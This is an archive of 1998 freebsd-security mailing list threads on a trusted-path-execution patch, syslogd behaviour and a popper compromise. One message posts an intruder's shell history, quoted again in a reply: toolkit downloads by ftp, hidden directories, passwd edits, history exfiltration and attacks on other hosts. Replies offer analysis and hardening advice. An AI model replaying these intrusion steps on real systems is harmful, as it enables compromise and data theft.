mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 25 09:34:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA22583 for freebsd-security-outgoing; Tue, 25 Aug 1998 09:34:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA22541 for ; Tue, 25 Aug 1998 09:34:03 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id CAA01466; Wed, 26 Aug 1998 02:32:57 +1000 (EST) Date: Wed, 26 Aug 1998 02:32:56 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: freebsd-security@FreeBSD.ORG Subject: trusted path execution patch Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Modelled somewhat on route's patch released in phrack52 that performs the same function (for Linux though), i've written a small patch to kern_exec.c that does just about the same thing. For those not familiar with route's patch (Phrack 52, article 6), it limits the execution of binaries to those in directories designated as "trusted". That being (in this case), those that aren't writable by group or other, and are owned by either root, bin, or have the gid of a "trusted" group. I've also hacked up access control for ld.so, to prevent unauthorised users using LD_LIBRARY_PATH and LD_PRELOAD to bypass the above patch. Configuration is via /etc/ld.access, which is the same format as login.access(5). You can get the patches from http://rabble.uow.edu.au/~nick/security/tpe.html I'd appreciate it if people could test it out and report back on any problems or improvements. :) Regards, Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A "When in doubt, ask someone wiser than yourself..." -unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 25 10:31:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA00618 for freebsd-security-outgoing; Tue, 25 Aug 1998 10:31:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA00606 for ; Tue, 25 Aug 1998 10:31:48 -0700 (PDT) (envelope-from Studded@dal.net) Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id KAA05846; Tue, 25 Aug 1998 10:30:53 -0700 (PDT) (envelope-from Studded@dal.net) Message-ID: <35E2F4CC.5820504D@dal.net> Date: Tue, 25 Aug 1998 10:30:52 -0700 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0823 i386) MIME-Version: 1.0 To: Archie Cobbs CC: hart@iserver.com, freebsd-security@FreeBSD.ORG Subject: Re: Scaring the bezeesus out of your system admin as a normal user: References: <199808250220.TAA17312@bubba.whistle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Archie Cobbs wrote: > > Paul Hart writes: > > This is kind of a related question, but in 2.2.7-RELEASE syslogd appears > > to have been modified to bind to its UDP port even if it is run with the > > -s flag. It does discard packets received on the port (but still logs a > > message about it!), but should it not even bind to the port when running > > in secure mode? It didn't bind to the port in previous versions, if > > memory serves. > > > > If this was a recent design decision that is meant to last, I think I will > > hack my syslogd back to the way it used to be. > > If you do, send it in with send-pr... this behavior seems kindof silly. This was discussed several months ago (check the archives for -Stable I think), but my understanding was that it was decided ultimately NOT to bind the port otherwise I would have made more noise about it myself. Doug -- *** Chief Operations Officer, DALnet IRC network *** When you don't know where you're going, every road will take you there. - Yiddish Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 25 13:02:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA24435 for freebsd-security-outgoing; Tue, 25 Aug 1998 13:02:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from RWSystems.net (Commie.RWSystems.net [204.251.23.221]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA24406 for ; Tue, 25 Aug 1998 13:02:41 -0700 (PDT) (envelope-from jwyatt@rwsystr.RWSystems.net) Received: from rwsystr.RWSystems.net([204.251.23.1]) (2509 bytes) by RWSystems.net via sendmail with P:smtp/R:inet_hosts/T:smtp (sender: ) id for ; Tue, 25 Aug 1998 14:43:22 -0500 (CDT) (Smail-3.2.0.101 1997-Dec-17 #1 built 1998-Jul-31) Date: Tue, 25 Aug 1998 14:45:26 -0500 (CDT) From: James Wyatt To: Paul Hart cc: freebsd-security@FreeBSD.ORG Subject: Re: Scaring the bezeesus out of your system admin as a normal user: In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 24 Aug 1998, Paul Hart wrote: > On Fri, 21 Aug 1998, Ben wrote: > > -s Operate in secure mode. Do not listen for log message from re- > > mote machines. > This is kind of a related question, but in 2.2.7-RELEASE syslogd appears > to have been modified to bind to its UDP port even if it is run with the > -s flag. It does discard packets received on the port (but still logs a > message about it!), but should it not even bind to the port when running > in secure mode? It didn't bind to the port in previous versions, if > memory serves. I would like to know if my syslogd receives packets from misconfigs or miscreants, but was thinking about using ipfw logging for it. This (IMHO, hackish) modification seems like too much of a bending from 'average' syslogd behaviour. Also: has anyone had a daemon that allowed authentication (from somewhere not normally 'trusted' via something like s-key) and then altered ipfw's rules to trust that site/host for a while? Like the securecard stuff where you telnet to the router, respond to a challenge, and then it annoints you for a count (once!) or time for telnet or ftp connect and then doesn't trust that net/address again. A daemon could bind to a given port, wait connect, perform authentication, query what level of access, enable host access, wait for a given peroid, and disable host access. The tricky part is limiting the number of connections: ipfw doesn't seem to know connection state. If I remove the routing rules the existing connections are dead. If I limit connects and allow other TCP packets through, I am exposed to session hijacking. Oh well, I was just curious if anyone else had done it, enough jabbering... Thanks and I *really* appreciate the amount of work that's gone into ipfw. James Wyatt (jwyatt@rwsystems.net) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 25 13:35:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA29678 for freebsd-security-outgoing; Tue, 25 Aug 1998 13:35:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA29670 for ; Tue, 25 Aug 1998 13:35:11 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id NAA29360; Tue, 25 Aug 1998 13:34:03 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma029356; Tue Aug 25 13:33:58 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id NAA15314; Tue, 25 Aug 1998 13:33:58 -0700 (PDT) From: Archie Cobbs Message-Id: <199808252033.NAA15314@bubba.whistle.com> Subject: Re: Scaring the bezeesus out of your system admin as a normal user: In-Reply-To: <35E2F4CC.5820504D@dal.net> from Studded at "Aug 25, 98 10:30:52 am" To: Studded@dal.net (Studded) Date: Tue, 25 Aug 1998 13:33:58 -0700 (PDT) Cc: hart@iserver.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Studded writes: > > > This is kind of a related question, but in 2.2.7-RELEASE syslogd appears > > > to have been modified to bind to its UDP port even if it is run with the > > > -s flag. It does discard packets received on the port (but still logs a > > > message about it!), but should it not even bind to the port when running > > > in secure mode? It didn't bind to the port in previous versions, if > > > memory serves. > > > > > > If this was a recent design decision that is meant to last, I think I will > > > hack my syslogd back to the way it used to be. > > > > If you do, send it in with send-pr... this behavior seems kindof silly. > > This was discussed several months ago (check the archives for -Stable I > think), but my understanding was that it was decided ultimately NOT to > bind the port otherwise I would have made more noise about it myself. Actually, he's right.. the -current syslogd will bind to the UDP port no matter whether -s is specified or not. It does drop packets (and log a warning) if it receives anything when -s is set. It looks like this is done because syslogd still needs a UDP socket from which to forward log entries when told to do so in /etc/syslog.conf. Guess that makes sense. -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 02:44:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA02847 for freebsd-security-outgoing; Wed, 26 Aug 1998 02:44:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA02820 for ; Wed, 26 Aug 1998 02:44:49 -0700 (PDT) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: from paranoid.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with ESMTP id NAA19947; Wed, 26 Aug 1998 13:43:50 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id NAA10214; Wed, 26 Aug 1998 13:47:07 GMT Date: Wed, 26 Aug 1998 13:47:07 GMT Message-Id: <199808261347.NAA10214@paranoid.eltex.spb.ru> In-Reply-To: from "James Wyatt " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Scaring the bezeesus out of your system admin as a normal user: To: jwyatt@rwsystr.RWSystems.net Cc: hart@iserver.com, freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, There was a thing in ipfilter (drop away that damn ipfw! ;) called ipauth - afair it was userspace authentication interface for filtering rules James Wyatt said : > Also: has anyone had a daemon that allowed authentication (from somewhere > not normally 'trusted' via something like s-key) and then altered ipfw's > rules to trust that site/host for a while? Like the securecard stuff where > you telnet to the router, respond to a challenge, and then it annoints you > for a count (once!) or time for telnet or ftp connect and then doesn't > trust that net/address again. > James Wyatt (jwyatt@rwsystems.net) _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNeQR2qH/mIJW9LeBAQEqKgP8D63Z4BMIDtinsbjorjozLDvqTPoxHAKa Hnx/lXLHnqMDdiVz4acQjkhQoXYHDCbT7PjIvBpKNMdytuaRDOGvVU3d52Wb32DB YlWHzj3gVRIuiy5k5XiML5+NXeFoJKluBWLPT+tBZomEdt2yswxO5SmGYRMxsw3S IGTpW0r6KBY= =jUki -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 14:01:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA17583 for freebsd-security-outgoing; Wed, 26 Aug 1998 14:01:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA17562 for ; Wed, 26 Aug 1998 14:01:05 -0700 (PDT) (envelope-from Studded@dal.net) Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id NAA03770; Wed, 26 Aug 1998 13:59:56 -0700 (PDT) (envelope-from Studded@dal.net) Message-ID: <35E4774B.53D0AA7C@dal.net> Date: Wed, 26 Aug 1998 13:59:55 -0700 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0823 i386) MIME-Version: 1.0 To: Archie Cobbs CC: hart@iserver.com, freebsd-security@FreeBSD.ORG Subject: Re: Scaring the bezeesus out of your system admin as a normal user: References: <199808252033.NAA15314@bubba.whistle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Archie Cobbs wrote: > Actually, he's right.. the -current syslogd will bind to the UDP port > no matter whether -s is specified or not. It does drop packets (and log > a warning) if it receives anything when -s is set. > > It looks like this is done because syslogd still needs a UDP socket > from which to forward log entries when told to do so in /etc/syslog.conf. It makes sense IF that directive is there in the conf file. I don't forward anything and I don't want to receive anything either. Doug (PS, this is happening on -stable too) -- *** Chief Operations Officer, DALnet IRC network *** When you don't know where you're going, every road will take you there. - Yiddish Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 14:06:11 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA18699 for freebsd-security-outgoing; Wed, 26 Aug 1998 14:06:11 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pubnix.org (www.pubnix.org [155.229.39.88]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA18644 for ; Wed, 26 Aug 1998 14:06:05 -0700 (PDT) (envelope-from jtb@pubnix.org) Received: from localhost (jtb@localhost) by pubnix.org (8.8.8/NooWop) with SMTP id QAA07819; Wed, 26 Aug 1998 16:09:28 -0400 (EDT) Date: Wed, 26 Aug 1998 16:09:26 -0400 (EDT) From: jtb To: Nicholas Charles Brawn cc: freebsd-security@FreeBSD.ORG Subject: Re: trusted path execution patch In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org While working on my hardened FreeBSD kernel last fall I had many discussions with Brian Matthews and Tom Ptacek about the TPE implementation I wanted to put into my kernel. As I was talking to Tom we got to discussing daemon9(route)'s implementation of tpe in the linux kernel, and Tom had told me that he had an alternate way of doing it. I have yet to implement it in my kernel as I have very little experience dealing with inode/vnode/namei information on files and directories. Anyways Tom explained to me the way he had done it was to create a linked list of trusted directories where applications could be excuted out of and at runtime to have execve() to check whether or not said file was in one of said directories. Like I said I don't know enough about namei information retrieval to implement this, but if someone wants to give me a hand I'd be more than willing to help them implement it, also if anyone else is doing something similar let me know, I'd be glad to lend a hand. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jonathan T. Bowie ADM w00w00 WSD jobe@sekurity.org jtb@pubnix.org jobe@dataforce.net Independant Security Developer Home: (603)436-5698 "I'd hate to advocate drugs, sex, alcohol violence... to any one, but they've worked for me." -- Hunter S. Thompson =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 19:25:11 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA14451 for freebsd-security-outgoing; Wed, 26 Aug 1998 19:25:11 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from garfield.bmk.com.au (bmkind.lnk.telstra.net [139.130.51.118]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA14446 for ; Wed, 26 Aug 1998 19:25:07 -0700 (PDT) (envelope-from brendan@bmk.com.au) Received: from localhost (brendan@localhost) by garfield.bmk.com.au (8.8.7/8.8.7) with SMTP id MAA02201 for ; Thu, 27 Aug 1998 12:26:13 +1000 (EST) (envelope-from brendan@bmk.com.au) Date: Thu, 27 Aug 1998 12:26:13 +1000 (EST) From: Brendan Kosowski To: FreeBSD Security Subject: FreeBSD 2.2.5 Security Problem Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I suspect a regular security break-in on my FreeBSD 2.2.5 system for the following reasons : ( Note1 : my system has a small number of users which I know well ) ( Note2 : my inetd.conf only enables FTPD, TELNETD & POPPER ) 1. My Internet costs increased by 10 times last month. 2. I often see 2 SHELLS running when I do a "ps -ax" even though I am the only person listed when I do a "who". 3. My SYSLOG messages file has lots of telnetd "undefined errors" during times when NO ONE is using the system. Can anyone help me ??? Does anyone have AN OFFICIAL LIST OF FreeBSD 2.2.5 SECURITY HOLES and HOW TO FIX THEM ??? Thanks & Regards, Brendan... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 21:57:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA04868 for freebsd-security-outgoing; Wed, 26 Aug 1998 21:57:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA04856 for ; Wed, 26 Aug 1998 21:57:08 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id VAA08883; Wed, 26 Aug 1998 21:55:56 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Wed, 26 Aug 1998 21:55:56 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Brendan Kosowski cc: FreeBSD Security Subject: Re: FreeBSD 2.2.5 Security Problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You probably got broken into through popper. Are you running qualcomm version? I suspect intruders either replaced telnetd/login binaries or simply connect to popper to get a shell. They also modified wtmp files to hide their presence on they system. This issue (popper bug) has been discussed before on this list. Anyone running FreeBSD IMHO should be on this list AND bugtraq if they care about security at all. I'd re-install the OS at this point since you have no way of knowing where you might have a back door. FreeBSD security advisories are located at: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/ You will not see popper advisory in this directory since popper is not part of the OS. If you do decide to re-install, take a look at www.best.com/~jkb/howto.txt for some basic steps one can take to make their FreeBSD a bit more secure out of the box. -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Brendan Kosowski wrote: > >I suspect a regular security break-in on my FreeBSD 2.2.5 system for the >following reasons : > > >( Note1 : my system has a small number of users which I know well ) >( Note2 : my inetd.conf only enables FTPD, TELNETD & POPPER ) > >1. My Internet costs increased by 10 times last month. > >2. I often see 2 SHELLS running when I do a "ps -ax" even though I am the >only person listed when I do a "who". > >3. My SYSLOG messages file has lots of telnetd "undefined errors" during >times when NO ONE is using the system. > > >Can anyone help me ??? > >Does anyone have AN OFFICIAL LIST OF FreeBSD 2.2.5 SECURITY HOLES and >HOW TO FIX THEM ??? > > > >Thanks & Regards, Brendan... > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 22:37:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA10982 for freebsd-security-outgoing; Wed, 26 Aug 1998 22:37:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from armitage.cylatech.com (armitage.cylatech.com [206.31.213.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA10977 for ; Wed, 26 Aug 1998 22:37:25 -0700 (PDT) (envelope-from macgyver@armitage.cylatech.com) Received: (from macgyver@localhost) by armitage.cylatech.com (8.8.8/8.8.8) id BAA01341 for security@freebsd.org; Thu, 27 Aug 1998 01:38:38 -0400 (EDT) (envelope-from macgyver) From: Wilson MacGyver Message-Id: <199808270538.BAA01341@armitage.cylatech.com> Subject: post breakin log To: security@FreeBSD.ORG Date: Thu, 27 Aug 1998 01:38:37 -0400 (EDT) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi guys, My FreeBSD box get hacked about two days ago... yes yes, via the popper. I reinstalled the system, but saved the log. I was looking through to see what he has done. There is some stuff you may find interesting... the log from history follows. >From the log, it seem he is very knowledgeable about FreeBSD. though I must admit, I don't get why he makes the /dev/sync. also, I don't know what the deal with the bnc* stuff He installed a backdoor on my system, and then attack a bunch of systems while he was on. He even has a freebsd root kit. :) any suggestion to prevent futher break in is apprecaited. other than "not to run popper" anymore. (grin) has anyone seen some of these programs he ran/install/compile before? Thanks, Mac ---------------------- cd /tmp telnet localhost 110 ls -la mv popper /usr/local/libexec/ telnet localhost 110 rm -rf free* cd /games ls -la cd /dev mkdir sync cd sync ftp worldnetworks.net tar -xvf b.tar rm -rf b.tar cd bnc* make pico bnc.conf mv bnc .. cd .. rm -rf bnc2* vi bnc.conf mv bnc pine pine exit ls cd /usr ld ls cd .. ls cd root ls -la cd .. locate bnc locate irc ls locate tcp.log cd /dev ls tail ptyr tail ptyr1 tail ptyp1 tail ptyq1 uname -a exit ls cd etc pico passwd tail passwd cd usr cd /usr ls cd sup ls ls -la cd src-all ls locate fbsdrootkit.tgz locate fb.tgz locate bnc.conf cd .. cd local ls cd .. ls cd /dev ls -la tail zero tail /root/.bash_history cd /root cp .bash_history h ftp bugs.mc.duke.edu rm h cd /dev cd sync ls tail bnc.conf exit cd /usr/games ls cd hack cd hide ls ls -la ./hack ls cd /dev/sync ls ls -la cd .. tail ptya locate irc irc BitchX cd sync ls tail bnc.conf telnet linuxppc.org telnet irc.686.org telnet irc686.com telnet irc.686.com who telnet onyx.eng.sunysb.edu telnet irc.686.com 90210 telnet declan.bio.columbia.edu telnet sleepy.uncg.edu telnet sleepy.uncg.edu telnet desoto.coosavalley.net telnet 209.16.220.8 telnet ramsis.spd.louisville.edu telnet nuptse.knowledge2000.com telnet ramses.spd.louisville.edu telnet cc607580-a.hwrd1.md.home.com pico tail /root/.bash_history ls uptime cd root ls tail .rhosts tail /etc/hosts.equiv cd /var/named cd var ls cd /var ls telnet STARLIGHT1.DIGITALSTARLIGHT.COM uname -a telnet www.cylatech.com rlogin -l ui8765 www.cylatech.com ls uname -a ftp bugs.mc.duke.edu gcc gcc -o bmb bmb.c ls ./bmb 207.153.39.89 23 ls rm bmb* ls exit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 23:27:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA18140 for freebsd-security-outgoing; Wed, 26 Aug 1998 23:27:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA18127 for ; Wed, 26 Aug 1998 23:27:11 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id XAA01147; Wed, 26 Aug 1998 23:26:11 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Wilson MacGyver cc: security@FreeBSD.ORG Subject: Re: post breakin log In-reply-to: Your message of "Thu, 27 Aug 1998 01:38:37 EDT." <199808270538.BAA01341@armitage.cylatech.com> Date: Wed, 26 Aug 1998 23:26:11 -0700 Message-ID: <1143.904199171@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > My FreeBSD box get hacked about two days ago... yes yes, via the popper. > I reinstalled the system, but saved the log. I was looking through to > see what he has done. There is some stuff you may find interesting... Not really... > From the log, it seem he is very knowledgeable about FreeBSD. Not really... :) > though I must admit, I don't get why he makes the /dev/sync. > also, I don't know what the deal with the bnc* stuff Just some rootkit. If anything, this guy looks more like a Linux kiddie than anything else - he gets his rootkits off Linux sites and seems to do most of his surfing (judging by the logs) accordingly. Also, the general use of irc & BitchX client is telling - this is clearly somebody who'd have been installing eggdrop 'bots next if he knew how to work that part out. :) > He installed a backdoor on my system, and then attack a bunch > of systems while he was on. He even has a freebsd root kit. :) Every 14 year old kid too young to drive or grow pubic hair has a FreeBSD rootkit. That's nothing particularly special or noteworthy these days, I hate to say. :) > any suggestion to prevent futher break in is apprecaited. > other than "not to run popper" anymore. (grin) Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your system on a daily basis. Those of us who do so were never hacked via popper or generally fall prey to the usual hack of the month (my popper was turned off no more than 2 hours after the first reports started, erm, "popping" up on the net). - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 26 23:32:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA19100 for freebsd-security-outgoing; Wed, 26 Aug 1998 23:32:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from nemesis.psionic.com (host65.tx.symbio.net [208.24.141.65] (may be forged)) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA19082 for ; Wed, 26 Aug 1998 23:32:21 -0700 (PDT) (envelope-from crowland@psionic.com) Received: (from maildrop@localhost) by nemesis.psionic.com id BAA26023; Thu, 27 Aug 1998 01:40:59 -0500 (CDT) X-Authentication-Warning: nemesis.psionic.com: maildrop set sender to using -f Received: from dolemite(192.168.2.10) by nemesis via smap (V2.0) id xma017319; Thu, 27 Aug 98 01:40:41 -0500 Date: Thu, 27 Aug 1998 01:31:03 -0400 (EDT) From: "Craig H. Rowland" X-Sender: crowland@dolemite To: Wilson MacGyver cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998, Wilson MacGyver wrote: . . . > > has anyone seen some of these programs he ran/install/compile > before? > > Thanks, > Mac > He is mainly pulling in tools from remote hosts to further leverage his access, he is also running irc probably a sniffer and other typical non-sense. You should go through your log and write to the admin of each site listed to tell them about the problem so they can get rid of the intruder as well. As an example you can look at his command: ftp worldnetworks.net Where he first went to get his bag-o-tricks to run on your box. Logging into this server you can see that it is horribly mis-configured with FTP as the owner of the root directory. The .forward file was modified to mail the passwd list off to another account, etc. I'm sure if you go down the list you'll find they are all compromised. This is pretty standard :( The /dev/sync directory is just a hiding place for his tools. Other common places include spool directories, user home directories, etc. It's pretty hard to tell where things will be placed once inside. The best thing to do is re-load your system (which it sounds like you've done). You'll also want to do some other things such as: 1) Ensure users don't re-use old passwords. 2) Keep up-to-date with security problems. 3) Shut off unneeded services. 4) Monitor your logs for suspicious activity. 5) Don't allow users shell access unless they need it. 6) Keep off-line cryptographically secure checksums of key system binaries and config files. 7) Limit access to system daemons to IP addresses that need them with some type of "wrapper" or IP filtering mechanism. 8) Shut off your r-services (rsh, rlogin) if you don't need them. It looks like he probably used a lot of transitive trusts (.rhosts, hosts.equiv) to move around your network. 9) Too many more to list here. :) Shameless plug: I wrote a quick page a while back describing some of the more common attacks I've seen against hosts. It may contain some useful information for you: http://www.psionic.com/papers/attacks.html -- Craig > ---------------------- > > cd /tmp > telnet localhost 110 > ls -la > mv popper /usr/local/libexec/ > telnet localhost 110 > rm -rf free* > cd /games > ls -la > cd /dev > mkdir sync > cd sync > ftp worldnetworks.net > tar -xvf b.tar > rm -rf b.tar > cd bnc* > make > pico bnc.conf > mv bnc .. > cd .. > rm -rf bnc2* > vi bnc.conf > mv bnc pine > pine > exit > ls > cd /usr > ld > ls > cd .. > ls > cd root > ls -la > cd .. > locate bnc > locate irc > ls > locate tcp.log > cd /dev > ls > tail ptyr > tail ptyr1 > tail ptyp1 > tail ptyq1 > uname -a > exit > ls > cd etc > pico passwd > tail passwd > cd usr > cd /usr > ls > cd sup > ls > ls -la > cd src-all > ls > locate fbsdrootkit.tgz > locate fb.tgz > locate bnc.conf > cd 